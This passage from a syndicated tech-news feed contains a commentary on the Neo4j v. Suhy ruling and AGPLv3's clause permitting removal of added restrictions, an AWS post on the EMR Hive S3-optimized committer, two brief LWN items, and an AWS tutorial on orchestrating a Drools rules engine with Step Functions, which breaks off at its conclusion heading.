accuses Suhy of improperly removing the “Commons Clause” from the codebase (and
subsequently redistributing the software under pure AGPLv3) in paragraph 77 of
their third amended complaint. (Note that Suhy denied these allegations in court — asserting that his removal of the “Commons Clause” was legitimate and permitted.)

Neo4j filed
for summary judgment
on all the issues, and throughout their summary
judgment motion, Neo4j argued that the removal of the “Commons Clause” from
the license information in the repository (and/or
Suhy’s suggestions to others that removal of the “Commons Clause” was legitimate)
constituted behavior that the Court should enjoin or otherwise
prohibit. The Court partially granted Neo4j’s motion for summary judgment. Much of
that ruling is not particularly related to FOSS licensing questions, but
the section regarding licensing deeply concerns us. Specifically, to support the Court’s order that temporarily prevents Suhy and others from saying that the Neo4j Enterprise edition that was released under the so-called “Neo4j Sweden Software License” is a “free and open source” version and/or alternative to proprietary-licensed Neo4j EE, the Court held that removal of the “Commons Clause” was not permitted. (BTW, the court confuses “commercial” and
“proprietary” in that section — it seems they do not
understand that FOSS can be commercial as well.)

In this instance, we’re not as concerned with the names used for the software as much as the copyleft licensing question — because it’s the software’s license, not its name, that either assures users’ fundamental software rights or prevents users from exercising them. Notwithstanding our disinterest
in the naming issue, we’d all likely agree that —
if “AGPLv3 WITH Commons-Clause” were a legitimate form of licensing — such a license is not FOSS.
The primary issue, therefore, is not about whether or not this software is FOSS, but whether or not the “Commons Clause” can
be legitimately removed by downstream licensees when presented with a license of “AGPLv3 WITH Commons-Clause”. We believe the Court held incorrectly by concluding that Suhy was not permitted to remove the “Commons Clause”. Their order that enjoins Suhy from calling the resulting code
“FOSS” — even if it’s a decision that bolsters a
minor goal of some activists — is problematic because the
underlying holding (if later upheld on appeal) could seriously harm
FOSS and copyleft.

The Confusion About the Appeal

Because this was an incomplete summary judgment and the case is ongoing,
the injunction against Suhy making such statements is a preliminary injunction,
and cannot be made permanent until the case actually completes in the trial court. The
decision
by the Ninth Circuit appeals court regarding this preliminary injunction
has
been widely reported by others as an “appeal decision” on the issue of what can be called “open source”. However, this
is not an appeal of the entire summary judgment decision, and certainly not an appeal of the entire case (which
cannot even be appealed until the case completes). The Ninth Circuit decision merely affirms that Suhy
remains under the preliminary injunction (which prohibits him and his companies from taking certain actions and saying certain things publicly) while the case continues. In fact, the standard that an
appeals Court uses when considering an appeal of a preliminary injunction differs from the standard for ordinary appeals. Generally speaking, appeals Courts
are highly deferential to trial courts regarding preliminary injunctions, and appeals of actual decisions have a much more stringent standard.

The Affero GPL Right to Restriction Removal

In their partial summary judgment ruling, the lower Court erred because they rejected an
important and (in our opinion) correct counter-argument made by Suhy’s attorneys.
Specifically, Suhy’s attorneys argued that Neo4j’s license expressly
permitted the removal of the “Commons Clause” from the
license. AGPLv3 was, in fact, drafted to permit such removal in this precise fact pattern.

Specifically, the AGPLv3 itself has the following provisions (found in AGPLv3§0 and
AGPLv3§7¶4):

  • “This License” refers to version 3 of the GNU Affero
    General Public License.
  • “The Program” refers to any copyrightable work licensed under this
    License. Each licensee is addressed as “you”.
  • If the Program as you received it, or any part of it, contains a notice
    stating that it is governed by this License along with a term that is a
    further restriction, you may remove that term.

That last term was added to address a real-world, known problem with GPLv2.
Frequently throughout the time when GPLv2 was the current version, original copyright holders and/or licensors
would attempt to license work under the GPL with additional restrictions. The problem was rampant and caused much confusion among licensees.
As an attempted solution, the FSF (the publisher of the various
GPL’s) loosened
its restrictions on reuse of the text of the GPL
— in hopes that would provide a route for
reuse of some GPL text, while also avoiding confusion for licensees. Sadly, many licensors
continued to take the confusing route of using the entire text of a GPL
license with an additional restriction — attached either before or after, or both. Their goals were obvious and nefarious: they
wanted to confuse the public into “thinking” the software was
under the GPL, but in fact restrict certain other activities (such as
commercial redistribution). They combined this practice with proprietary relicensing (i.e., a sole
licensor selling separate proprietary licenses while releasing a (seemingly FOSS) public version of the code as demoware for marketing).
Their goal is to build on the popularity of the GPL, but in direct opposition to the GPL’s policy goals; they manipulate the GPL to open-wash bad policies rather than give actual rights to users.
This tactic even permitted bad actors to sell “gotcha” proprietary licenses to those who were legitimately confused. For example,
a company would look for users operating commercially with the code in compliance with GPLv2, but who hadn’t noticed the company’s code had the statement: “Licensed GPLv2, but not for commercial use”. The user had seen GPLv2, and knew from its brand reputation that it
gave certain rights, but hadn’t realized that the additional restriction outside of the GPLv2’s text might actually be valid. The goal was to catch users
in a sneaky trap.

Neo4j tried to use the AGPLv3 to set one of those traps. Neo4j, despite the permission in the FSF’s GPL FAQ to “use the GPL
terms (possibly modified) in another license provided that you call your
license by another name and do not include the GPL preamble”, left the entire AGPLv3 intact as the license of the software — adding only a note at the front and at the end. However, their users can escape the trap, because GPLv3 (and AGPLv3) added
a clause (which doesn’t exist in GPLv2) to defend users from this. Specifically,
AGPLv3§7¶4 includes a key provision to help this situation.

Specifically, the clause was designed to give more rights to downstream recipients when bad
actors attempt this nasty trick. Indeed, I recall from my direct participation in
the A/GPLv3 drafting that this provision was specifically designed for the
situation where the original, sole copyright
holder/licensor [0]
added additional restrictions. And, I’m not the only one who recalls this.
Richard Fontana (now a lawyer at IBM’s Red Hat,
but previously legal counsel to the FSF during the GPLv3 process), wrote on a mailing list [1]
in
response to the Neo4j preliminary injunction ruling:

For those who care about anecdotal drafting history … the whole point of the section 7 clause (“If the Program as you received it, or any part of
it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that
term.”) was to address the well known problem of an original GPL
licensor tacking on non-GPL, non-FOSS, GPL-norm-violating
restrictions, precisely like the use of the Commons Clause with the
GPL. Around the time that this clause was added to the GPLv3 draft,
there had been some recent examples of this phenomenon that had been
picked up in the tech press.

Fontana also pointed us to the FSF’s own words on the subject, written during their process of drafting this section of the license (emphasis ours):

Unlike additional permissions, additional requirements that are allowed under subsection 7b may not be removed. The revised section 7 makes clear that this condition does not apply to any other additional requirements, however, which are removable just like additional permissions. Here we are particularly concerned about the practice of program authors who purport to license their works under the GPL with an additional requirement that contradicts the terms of the GPL, such as a prohibition on commercial use. Such terms can make the program non-free, and thus contradict the basic purpose of the GNU GPL; but even when the conditions are not fundamentally unethical, adding them in this way invariably makes the rights and obligations of licensees uncertain.

While the intent of the original drafter of a license text is not
dispositive over the text as it actually appears in the license, all this information was available to Neo4j
as they drafted their license. Many voices in the community had told them that provision in AGPLv3§7¶4
was added specifically to prevent what Neo4j was trying to do. The FSF, the copyright holder of the actual text of the AGPLv3, also publicly
gave Neo4j permission to draft a new license, using any provisions they like from AGPLv3
and putting them together in a new way. But Neo4j made a conscious choice to not do that,
but instead constructed their license in the exact manner that allowed Suhy’s removal
of the “Commons Clause”.

In addition, that provision in AGPLv3§7¶4 has little
meaning if it’s not intended to bind the original licensor!
Many other provisions (such as AGPLv3§10¶3) protect the users
against further restrictions imposed later in the distribution chain of
licensees. This clause was targeted from its inception against the
exact, specific bad behavior that Neo4j did here.

We don’t dispute that copyright and contract law give Neo4j authority to
license their work under any terms they wish — including terms that we consider unethical or immoral. In fact, we already pointed out above that
Neo4j had permission to pick and choose only some text from AGPLv3. As long as
they didn’t use the name “Affero”, “GNU” or
“General Public” or include any of the Preamble text in the name/body of
their license — we’d readily agree that Neo4j could have put together a bunch
of provisions from the AGPLv3, and/or the “Commons Clause”, and/or any other license
that suited their fancy. They could have made an entirely new license. Lawyers commonly do share text of
licenses and contracts to jump-start writing new ones. That’s a
practice we generally support (since it’s sharing a true commons of ideas freely — even if the resulting license might not be FOSS).

But Neo4j consciously chose not to do that. Instead, they license their software
“subject to the terms of the GNU AFFERO GENERAL PUBLIC LICENSE Version
3, with the Commons Clause”
. (The name “Neo4j Sweden Software
License” only exists in the later Court papers, BTW, not with “The Program” in question.) Neo4j defines
“This License” to mean “version 3 of the GNU Affero General
Public License.” Then, Neo4j tells all licensees
that “If the Program as you received it, or any part of it, contains a
notice stating that it is governed by this License along with a term that is
a further restriction, you may remove that term”. Yet, after all that, Neo4j had the audacity
to claim to the Court that they didn’t actually mean that last sentence, and the Court rubber-stamped that view.

Simply put, the Court erred when it said: “Neither of the two provisions in the form AGPLv3 that Defendants point to give licensees the right to remove the information at issue.” The Court then used that error as a basis for its ruling
to temporarily enjoin Suhy from stating that software with
“Commons Clause” removed by downstream is “free and open
source”, or tell others that he disagrees with the Court’s (temporary) conclusion about removing the “Commons Clause” in this situation.

What Next?

The case isn’t over. The lower Court still has various issues to consider — including a DMCA claim regarding
Suhy’s removal of the “Commons Clause”.
We suspect that’s why the Court only made a preliminary injunction against Suhy’s
words, and did not issue an injunction against the actual removal of
the clause! The issue as to whether the clause can be removed is still pending, and the current summary judgment decision doesn’t address
the DMCA claim from Neo4j’s complaint.

Sadly,
the Court
has temporarily enjoined Suhy
from “representing that Neo4j
Sweden AB’s addition of the Commons Clause to the license governing Neo4j
Enterprise Edition violated the terms of AGPL or that removal of the Commons
Clause is lawful, and similar statements”. But they haven’t enjoined
us, and our view on the matter is as follows:

Clearly, Neo4j gave explicit permission, pursuant to the
AGPLv3, for anyone who would like to remove the “Commons
Clause” from their LICENSE.txt file in version 3.4 and other versions
of their Enterprise edition where it appears. We believe that you have full
permission, pursuant to AGPLv3, to distribute that software under the terms
of the AGPLv3 as written. In saying that, we also point out that we’re not
a law firm, our lawyers are not your lawyers, and this is not legal advice.
However, after our decades of work in copyleft licensing, we know well the
reason and motivations of this policy in the license (described above), and given the error by
the Court, it’s our civic duty to inform the public that the
licensing conclusions (upon which they based their temporary injunction) are incorrect.

Meanwhile, despite what you may have read last week, the key software licensing issues in this
case have not been decided — even by the lower Court. For example, the DMCA issue is still before the trial court.
Furthermore, if
you do read the docket of this case, it will be obvious that
neither party is perfect. We have not analyzed every action Suhy took, nor do we have any comment
on any action by Suhy other than this: we believe that Suhy’s
removal of the “Commons Clause” was fully permitted by
the terms of the AGPLv3, and that Neo4j gave him that permission in that license. Suhy also did a great service to the community by taking
action that obviously risked litigation against him.
Misappropriation and manipulation of the strongest and most
freedom-protecting copyleft license ever written to bolster a proprietary
relicensing business model is an affront to FOSS and its advancement. It’s even worse when the Courts are on the side of the bad actor.
Neo4j should not have done this.

Finally, we note that the Court was rather narrow on what it said regarding the question of “What Is Open Source?”. The Court
ruled that one individual and his companies — when presented with ambiguous licensing information
in one part of a document, who then finds another part of the document grants permission
to repair and clarify the licensing information, and does so — is temporarily forbidden
from telling others that the resulting software is, in fact, FOSS, after making such a change.
The ruling does not set precedent, nor does it bind anyone other than the Defendants as to what
they can or cannot say is FOSS, which is why we can say it is FOSS, because the AGPLv3 is an OSI-approved
license and the AGPLv3 permits removal of the toxic “Commons Clause” in this situation.

We will continue to follow this case and write further when new events occur.


[0] We were unable to find anywhere in the Court record that shows Neo4j used a Contributor Licensing Agreement (CLA) or Copyright
Assignment Agreement (©AA) that sufficiently gave them exclusive rights as licensor of this software. We did however
find evidence online that Neo4j accepted contributions from others. If Neo4j is, in fact, also a licensor of others’ AGPLv3’d
derivative works that have been incorporated into their upstream versions, then there are many other arguments (in addition to the one
presented herein) that would permit removal of the “Commons Clause”. This issue remains an open question of fact in this case.

[1] Fontana made these statements on a mailing list
governed by an odd confidentiality rule called CHR (which was originally designed for in-person meetings with a beginning and an end, not
a mailing list). Nevertheless, Fontana explicitly waived CHR (in writing) to allow me to quote his words publicly.

Up to 15 times improvement in Hive write performance with the Amazon EMR Hive zero-rename feature

Post Syndicated from Suthan Phillips original https://aws.amazon.com/blogs/big-data/up-to-15-times-improvement-in-hive-write-performance-with-the-amazon-emr-hive-zero-rename-feature/

Our customers use Apache Hive on Amazon EMR for large-scale data analytics and extract, transform, and load (ETL) jobs. Amazon EMR Hive uses Apache Tez as the default job execution engine, which creates Directed Acyclic Graphs (DAGs) to process data. Each DAG can contain multiple vertices from which tasks are created to run the application in parallel. Their final output is written to Amazon Simple Storage Service (Amazon S3).

Hive initially writes data to staging directories and then moves it to the final location after a series of rename operations. This design supports task failure recovery, such as rescheduling a failed task with another attempt, running speculative execution, and recovering from a failed job attempt. These move and rename operations don't have a significant performance impact in HDFS, where a rename is only a metadata operation. On Amazon S3, however, a rename is implemented as a copy followed by a delete, so performance can degrade significantly as the number of files written grows.

This post discusses the new optimized committer for Hive in Amazon EMR and also highlights its impressive performance by running a TPCx-BB performance benchmark and comparing it with the Hive default commit logic.

How Hive commit logic works

By default, Apache Hive manages the task and job commit phases itself and doesn't support pluggable Hadoop output committers, which would otherwise let you customize Hive's file commit behavior.

In its current state, the rename operation with Hive-managed and external tables happens in three places:

  • Task commit – Each task attempt writes its output to its own staging directory. In the task commit phase, these files are renamed and moved to a task-specific staging directory.
  • Job commit – In this phase, the final output is generated from the output of all committed tasks of a job attempt. Task-specific staging directories are renamed and moved to the job commit staging directory.
  • Move task – The job commit staging directory is renamed or moved to the final table directory.

The impact of these rename operations is more significant on Hive jobs writing a large number of files.
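
To make these phases concrete, here is a minimal sketch of how a single output file might travel through the three rename steps. The paths are hypothetical placeholders, not the exact staging directory names Hive generates:

s3://bucket/warehouse/sales/.staging/attempt_0/000000_0      (task attempt output)
-> s3://bucket/warehouse/sales/.staging/task_00000/000000_0  (task commit)
-> s3://bucket/warehouse/sales/.staging/job_0001/000000_0    (job commit)
-> s3://bucket/warehouse/sales/000000_0                      (move task)

Each arrow is a rename, and on Amazon S3 each rename of a file is a copy followed by a delete, so the cost grows with the number of files written.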

Hive EMRFS S3-optimized committer

To mitigate the slowdown in write performance due to renames, we added support for output committers in Hive. We developed a new output committer, the Hive EMRFS S3-optimized committer, to avoid Hive rename operations. This committer directly writes the data to the output location, and the file commit happens only at the end of the job to ensure that it is resilient to job failures.

It modifies the default Hive file naming convention from <task_id>_<attempt_id>_<copy_n> to <task_id>_<attempt_id>_<copy_n>-<query_id>. For example, after an insert query in a Hive table, the output file is generated as 000000_0-hadoop_20210714130459_ba7c23ec-5695-4947-9d98-8a40ef759222-1 instead of 000000_0, where the suffix is the combination of user_name, timestamp, and UUID, which forms the query ID.

Performance evaluation

We ran the TPCx-BB Express Benchmark tests with and without the new committer and evaluated the write performance improvement.

The following graph shows the performance improvement measured as the total runtime of the queries. With the new committer, the runtime is better (lower).

This optimization is for Hive writes and hence the majority of improvement occurred in the load test, which is the writing phase of the benchmark. We observed an approximate 15-times reduction in runtime. However, we didn’t see much improvement in the power test and throughput test because each query is just writing a single file to the final table.

The benchmark used in this post is derived from the industry-standard TPCx-BB benchmark, and has the following characteristics:

  • The schema and data are used unmodified from TPCx-BB.
  • The scale factor used is 1000.
  • The queries are used unmodified from TPCx-BB.
  • The suite has three tests: the load test is the process of building the test database and is write heavy; the power test measures how fast the system can run all the queries; and the throughput test runs the queries in concurrent streams. The elapsed run times are used as the primary metric.
  • The power tests and throughput tests include 25 out of 30 queries. The five queries for machine learning workloads were excluded.

Note that this is derived from the TPCx-BB benchmark, and as such is not comparable to published TPCx-BB results, as the results of our tests do not comply with the specification.

Understanding performance impact with different data sizes and number of files

To benchmark the performance impact with variable data sizes and number of files, we also evaluated the following INSERT OVERWRITE query over the store_sales table from the TPC-DS dataset with additional variations, such as size of data (1 GB, 5 GB, 10 GB, 25 GB, 50 GB, 100 GB), number of files, and number of partitions:

SET partitions=100.0;
SET files_per_partition=10;

CREATE TABLE store_sales_simple_test
(ss_sold_time_sk int, ss_item_sk int, ss_customer_sk int,
ss_cdemo_sk int, ss_hdemo_sk int, ss_addr_sk int,
ss_store_sk int, ss_promo_sk int, ss_ticket_number bigint,
ss_quantity int, ss_wholesale_cost decimal(7,2),
ss_list_price decimal(7,2), ss_sales_price decimal(7,2),
ss_ext_discount_amt decimal(7,2),
ss_ext_sales_price decimal(7,2),
ss_ext_wholesale_cost decimal(7,2),
ss_ext_list_price decimal(7,2), ss_ext_tax decimal(7,2),
ss_coupon_amt decimal(7,2), ss_net_paid decimal(7,2),
ss_net_paid_inc_tax decimal(7,2),
ss_net_profit decimal(7,2), ss_sold_date_sk int)
PARTITIONED BY (part_key int)
STORED AS ORC
LOCATION 's3://<bucket>/<table_location>';

INSERT OVERWRITE TABLE store_sales_simple_test
SELECT *, FLOOR(RAND()*${partitions}) AS part_key
FROM store_sales DISTRIBUTE BY part_key, FLOOR(RAND()*${files_per_partition});

The results show that the number of files written is the critical factor for performance improvement when using this new committer in comparison to the default Hive commit logic.

In the following graph, the y-axis denotes the speedup (total time taken with rename / total time taken by query with committer), and the x-axis denotes the data size.

Enabling the feature

To enable Amazon EMR Hive to use HiveEMRFSOptimizedCommitter to commit data as the default for all Hive-managed and external tables, use the following hive-site configuration starting with EMR 6.5.0 or EMR 5.34.0 clusters:

[
  {
    "classification": "hive-site",
    "properties": {
      "hive.blobstore.use.output-committer": "true"
    }
  }
]
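
If you create clusters programmatically, the same classification can also be supplied through the Amazon EMR API. The following is a minimal boto3 sketch; the cluster name, instance types, IAM roles, and region are placeholder assumptions, not values from this post:

import boto3

emr = boto3.client("emr", region_name="us-east-1")

# Launch an EMR 6.5.0 cluster with Hive and the hive-site classification
# that enables the EMRFS S3-optimized committer for Hive.
response = emr.run_job_flow(
    Name="hive-zero-rename-demo",
    ReleaseLabel="emr-6.5.0",
    Applications=[{"Name": "Hive"}, {"Name": "Tez"}],
    Configurations=[
        {
            "Classification": "hive-site",
            "Properties": {"hive.blobstore.use.output-committer": "true"},
        }
    ],
    Instances={
        "MasterInstanceType": "m5.xlarge",  # placeholder instance types
        "SlaveInstanceType": "m5.xlarge",
        "InstanceCount": 3,
        "KeepJobFlowAliveWhenNoSteps": True,
    },
    JobFlowRole="EMR_EC2_DefaultRole",      # default EMR roles; adjust to your account
    ServiceRole="EMR_DefaultRole",
)
print(response["JobFlowId"])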

The new committer is not compatible with the hive.exec.parallel=true setting. Be sure not to enable both settings at the same time in Amazon EMR 6.5.0. In future Amazon EMR releases, parallel execution will be disabled automatically when the new Hive committer is used.

Limitations

This committer is not used, and the default Hive commit logic is applied instead, in the following scenarios:

  • When the small-file merge option (hive.merge.tezfiles) is enabled
  • When using Hive ACID tables
  • When partitions are distributed across file systems such as HDFS and Amazon S3

Summary

The Hive EMRFS S3-optimized committer improves write performance compared to the default Hive commit logic by eliminating Amazon S3 renames. You can use this feature starting with Amazon EMR 6.5.0 and Amazon EMR 5.34.0.

Stay tuned for additional updates on new features and further improvements in Apache Hive on Amazon EMR.


About the Authors

Suthan Phillips works with customers to provide them architectural guidance and helps them achieve performance enhancements for complex applications on Amazon EMR. In his spare time, he enjoys hiking and exploring the Pacific Northwest.

Aditya Shah is a Software Development Engineer at AWS. He is interested in Databases and Data warehouse engines and has worked on distributed filesystem, ACID compliance and metadata management of Apache Hive. When not thinking about data, he is browsing pages of internet to sate his appetite for random trivia and is a movie geek at heart.

Syed Shameerur Rahman is a software development engineer at Amazon EMR. He is interested in highly scalable, distributed computing. He is an active contributor of open source projects like Apache Hive, Apache Tez, Apache ORC and has contributed important features and optimizations. During his free time, he enjoys exploring new places and food.

[$] Problems emerge for a unified /dev/*random

Post Syndicated from original https://lwn.net/Articles/889452/

In mid-February, we reported on the plan to
unite the two kernel devices that provide random numbers;
/dev/urandom was to effectively just be another way to access the
random numbers provided by /dev/random. That change made it as
far as the mainline during the Linux 5.18 merge window, but it was
quickly reverted when problems were found. It may be possible to
do that unification someday, but, for now, there are environments that need
their random numbers early on—without entropy or the “Linus jitter dance”
being available on the platform.

Fedora 36 beta released

Post Syndicated from original https://lwn.net/Articles/889602/

The Fedora
36 beta release
has been announced.

Fedora 36 Workstation Beta includes GNOME 42, the newest release of
the GNOME desktop environment. GNOME 42 includes a global dark
style UI setting. It also has a redesigned screenshot tool. And
many core GNOME apps have been ported to the latest version of the
GTK toolkit, providing improved performance and a modern look.

If all goes well, the final Fedora 36 release will happen at the end of April.

Using AWS Step Functions and Amazon DynamoDB for business rules orchestration

Post Syndicated from James Beswick original https://aws.amazon.com/blogs/compute/using-aws-step-functions-and-amazon-dynamodb-for-business-rules-orchestration/

This post is written by Vijaykumar Pannirselvam, Cloud Consultant, Sushant Patil, Cloud Consultant, and Kishore Dhamodaran, Senior Solution Architect.

A Business Rules Engine (BRE) is used in enterprises to manage business-critical decisions. The logic or rules used to make such decisions can vary in complexity. A finance department may have a basic rule requiring director approval for any purchase over a certain dollar amount. A mortgage company may need to run complex rules based on inputs (for example, credit score, debt-to-income ratio, down payment) to make an approval decision for a loan.

Decoupling these rules from application logic provides agility to your rules management, since business rules may often change while your application may not. It can also provide standardization across your enterprise, so every department can communicate with the same taxonomy.

As part of migrating their workloads, some enterprises consider replacing their commercial rules engine with cloud native and open-source alternatives. The motivation for such a move stems from several factors, such as simplifying the architecture, cost, security considerations, or vendor support.

Many of these commercial rules engines come as part of a business process management suite (BPMS) offering that provides orchestration capabilities for rules execution. For a successful migration to the cloud using an open-source rules engine management system, you need an orchestration capability to manage incoming rule requests, audit the rules, and track exceptions.

This post showcases an orchestration framework that allows you to use an open-source rules engine. It uses the Drools rules engine to build a set of rules for calculating insurance premiums based on the properties of Car and Person objects, and it orchestrates rule execution with AWS Step Functions, AWS Lambda, Amazon API Gateway, and Amazon DynamoDB. You can swap in a different rules engine, provided you can manage it in the AWS Cloud environment and expose it as an API.

Solution overview

The following diagram shows the solution architecture.

Solution architecture

The solution comprises:

  1. API Gateway – a fully managed service that makes it easier to create, publish, maintain, monitor, and secure APIs at any scale for API consumers. API Gateway helps you manage traffic to backend systems, in this case Step Functions, which orchestrates the execution of tasks. For the REST API use-case, you can also set up a cache with customizable keys and time-to-live in seconds for your API data to avoid hitting your backend services for each request.
  2. Step Functions – a low-code service to orchestrate the multiple steps involved in accomplishing a task. Step Functions uses the finite-state machine (FSM) model, which uses defined states and transitions to complete the tasks. The diagram depicts three states: Audit Request, Execute Ruleset, and Audit Response, which are executed sequentially. You can add additional states and transitions, such as validating incoming payloads or branching out parallel execution of the states.
  3. Drools rules engine Spring Boot application – runtime component of the rule execution. You set the Drools rule engine Spring Boot application as an Apache Maven Docker project with Drools Maven dependencies. You then deploy the Drools rule engine Docker image to an Amazon Elastic Container Registry (Amazon ECR), create an AWS Fargate cluster, and an Amazon Elastic Container Service (Amazon ECS) service. The service launches Amazon ECS tasks and maintains the desired count. An Application Load Balancer distributes the traffic evenly to all running containers.
  4. Lambda – a serverless execution environment that interacts with the Drools engine and provides the persistence layer for rule execution audit functions. The Lambda component provides the audit function that persists the incoming requests and outgoing responses in DynamoDB. Apart from the audit function, Lambda is also used to invoke the service exposed by the Drools Spring Boot application.
  5. DynamoDB – a fully managed and highly scalable key/value store, to persist the rule execution information, such as request and response payload information. DynamoDB provides the persistence layer for the incoming request JSON payload and for the outgoing response JSON payload. The audit Lambda function invokes the DynamoDB put_item() method when it receives the request or response event from Step Functions. The DynamoDB table rule_execution_audit has an entry for every request and response associated with the incoming request-id originated by the application (upstream).
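
To illustrate the audit step described in item 5, here is a minimal, hypothetical sketch of an audit Lambda handler written with boto3. The rule_execution_audit table name and the audit_id and request_id attributes come from this post; the remaining item attributes are assumptions and may differ from the sample project:

import json
import uuid
from datetime import datetime, timezone

import boto3

# Table name from this post; the item attributes other than audit_id are assumptions.
audit_table = boto3.resource("dynamodb").Table("rule_execution_audit")

def handler(event, context):
    # Persist the request or response payload handed over by Step Functions.
    audit_table.put_item(
        Item={
            "audit_id": str(uuid.uuid4()),  # key attribute shown later in the DynamoDB console walkthrough
            "request_id": event.get("context", {}).get("request_id", "UNKNOWN"),
            "recorded_at": datetime.now(timezone.utc).isoformat(),
            "payload": json.dumps(event),   # full request or response JSON
        }
    )
    return event  # pass the payload through to the next state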

Drools rules engine implementation

The Drools rules engine separates the business rules from the business processes. You use DRL (Drools Rule Language) by defining business rules as .drl text files. You define model objects to build the rules.

The model objects are POJOs (Plain Old Java Objects) defined using Eclipse with the Drools plugin installed. You should have some knowledge of building rules and executing them using the Drools rules engine. The following diagram describes the functions of this component.

Drools process

You define the following rules in the .drl file as part of the GitHub repo. The purpose of these rules is to evaluate the driver premium based on the model objects provided as input. The inputs are Car and Driver objects, and the output is the Policy object, whose premium is calculated based on the criteria defined in the rules:

rule "High Risk"
     when     
         $car : Car(style == "SPORTS", color == "RED") 
         $policy : Policy() 
         and $driver : Driver ( age < 21 )                             
     then
         System.out.println(drools.getRule().getName() +": rule fired");          
         modify ($policy) { setPremium(increasePremiumRate($policy, 20)) };
 end
 
 rule "Med Risk"
     when     
         $car : Car(style == "SPORTS", color == "RED") 
         $policy : Policy() 
         and $driver : Driver ( age > 21 )                             
     then
         System.out.println(drools.getRule().getName() +": rule fired");          
         modify ($policy) { setPremium(increasePremiumRate($policy, 10)) };
 end
 
 
 function double increasePremiumRate(Policy pol, double percentage) {
     return (pol.getPremium() + pol.getPremium() * percentage / 100);
 }
 

Once the rules are defined, you define a RestController that takes input parameters and evaluates the above rules. The following code snippet is a POST method defined in the controller, which handles the requests and sends the response to the caller.

@PostMapping(value ="/policy/premium", consumes = {MediaType.APPLICATION_JSON_VALUE, MediaType.APPLICATION_XML_VALUE }, produces = {MediaType.APPLICATION_JSON_VALUE, MediaType.APPLICATION_XML_VALUE})
    public ResponseEntity<Policy> getPremium(@RequestBody InsuranceRequest requestObj) {
        
        System.out.println("handling request...");
        
        Car carObj = requestObj.getCar();        
        Car carObj1 = new Car(carObj.getMake(),carObj.getModel(),carObj.getYear(), carObj.getStyle(), carObj.getColor());
        System.out.println("###########CAR##########");
        System.out.println(carObj1.toString());
        
        System.out.println("###########POLICY##########");        
        Policy policyObj = requestObj.getPolicy();
        Policy policyObj1 = new Policy(policyObj.getId(), policyObj.getPremium());
        System.out.println(policyObj1.toString());
            
        System.out.println("###########DRIVER##########");    
        Driver driverObj = requestObj.getDriver();
        Driver driverObj1 = new Driver( driverObj.getAge(), driverObj.getName());
        System.out.println(driverObj1.toString());
        
        // Create a new Drools session, insert the facts, and fire all matching rules;
        // the rules update policyObj1's premium in place.
        KieSession kieSession = kieContainer.newKieSession();
        kieSession.insert(carObj1);
        kieSession.insert(policyObj1);
        kieSession.insert(driverObj1);
        kieSession.fireAllRules();
        printFactsMessage(kieSession);
        kieSession.dispose();
    
        
        return ResponseEntity.ok(policyObj1);
    }    
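
If you want to exercise just the Spring Boot service outside the Step Functions flow, a request like the following can be sent to the /policy/premium endpoint. This is a rough sketch: the host and port and the exact JSON field names of InsuranceRequest are assumptions inferred from the getters above, so adjust them to match the sample project.

import requests

# Hypothetical local endpoint of the Drools Spring Boot application
url = "http://localhost:8080/policy/premium"

payload = {
    "car": {"make": "honda", "model": "civic", "year": "2015",
            "style": "SPORTS", "color": "RED"},
    "driver": {"age": 18, "name": "Brian"},
    "policy": {"id": 1231231, "premium": 300},
}

response = requests.post(url, json=payload, headers={"Accept": "application/json"})
response.raise_for_status()
print(response.json())  # expect the premium increased by the "High Risk" rule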

Prerequisites

To follow the walkthrough, you need an AWS account, the AWS CLI, the AWS SAM CLI, Git, Docker, and Apache Maven with a Java JDK installed locally.

Solution walkthrough

  1. Clone the project GitHub repository to your local machine, do a Maven build, and create a Docker image. The project contains Drools related folders needed to build the Java application.
    git clone https://github.com/aws-samples/aws-step-functions-business-rules-orchestration
    cd drools-spring-boot
    mvn clean install
    mvn docker:build
    
  2. Create an Amazon ECR private repository to host your Docker image.
    aws ecr create-repository --repository-name drools_private_repo --image-tag-mutability MUTABLE --image-scanning-configuration scanOnPush=false
  3. Tag the Docker image and push it to the Amazon ECR repository.
    aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin <<INSERT ACCOUNT NUMBER>>.dkr.ecr.us-east-1.amazonaws.com
    docker tag drools-rule-app:latest <<INSERT ACCOUNT NUMBER>>.dkr.ecr.us-east-1.amazonaws.com/drools_private_repo:latest
    docker push <<INSERT ACCOUNT NUMBER>>.dkr.ecr.us-east-1.amazonaws.com/drools_private_repo:latest
    
  4. Deploy resources using AWS SAM:
    cd ..
    sam build
    sam deploy --guided

    SAM deployment output

Verifying the deployment

Verify the business rules execution and the orchestration components:

  1. Navigate to the API Gateway console, and choose the rules-stack API.
    API Gateway console
  2. Under Resources, choose POST, followed by TEST.
    Resource configuration
  3. Enter the following JSON under the Request Body section, and choose Test.

    {
      "context": {
        "request_id": "REQ-99999",
        "timestamp": "2021-03-17 03:31:51:40"
      },
      "request": {
        "driver": {
          "age": "18",
          "name": "Brian"
        },
        "car": {
          "make": "honda",
          "model": "civic",
          "year": "2015",
          "style": "SPORTS",
          "color": "RED"
        },
        "policy": {
          "id": "1231231",
          "premium": "300"
        }
      }
    }
    
  4. The response received shows the results from the evaluation of the business rule “High Risk”, with the premium reflecting the percentage calculation in the rule definition (a quick sanity check of this arithmetic appears after the walkthrough). Try changing the request input to evaluate the “Med Risk” rule by modifying the age of the driver to 22 or higher:
    Sample response
  5. Optionally, you can verify the API using Postman. Get the endpoint information by navigating to the rule-stack API, followed by Stages in the navigation pane, then choosing either Dev or Stage.
  6. Enter the payload in the request body and choose Send:
    Postman UI
  7. As with the console test, the response shows the result of evaluating the “High Risk” rule. Try changing the request input to evaluate the “Med Risk” rule by modifying the age of the driver to 22 or higher.
    Body JSON
  8. Observe the request and response audit logs. Navigate to the DynamoDB console. Under the navigation pane, choose Tables, then choose rule_execution_audit.
    DynamoDB console
  9. Under the Tables section in the navigation pane, choose Explore Items. Observe the individual audit logs by choosing the audit_id.
    Table audit item
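
As a quick sanity check on the responses in steps 4 and 7, the premium arithmetic mirrors the increasePremiumRate helper defined in the DRL file; here is a small Python rendering of that calculation:

def increase_premium_rate(premium: float, percentage: float) -> float:
    # Mirrors the increasePremiumRate helper from the DRL file.
    return premium + premium * percentage / 100

print(increase_premium_rate(300, 20))  # "High Risk" (driver under 21): 360.0
print(increase_premium_rate(300, 10))  # "Med Risk" (driver over 21): 330.0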

Cleaning up

To avoid incurring ongoing charges, clean up the infrastructure by deleting the stack using the following command:

sam delete

SAM confirmations

Delete the Amazon ECR repository, and any other resources you created as a prerequisite for this exercise.

Conclusion

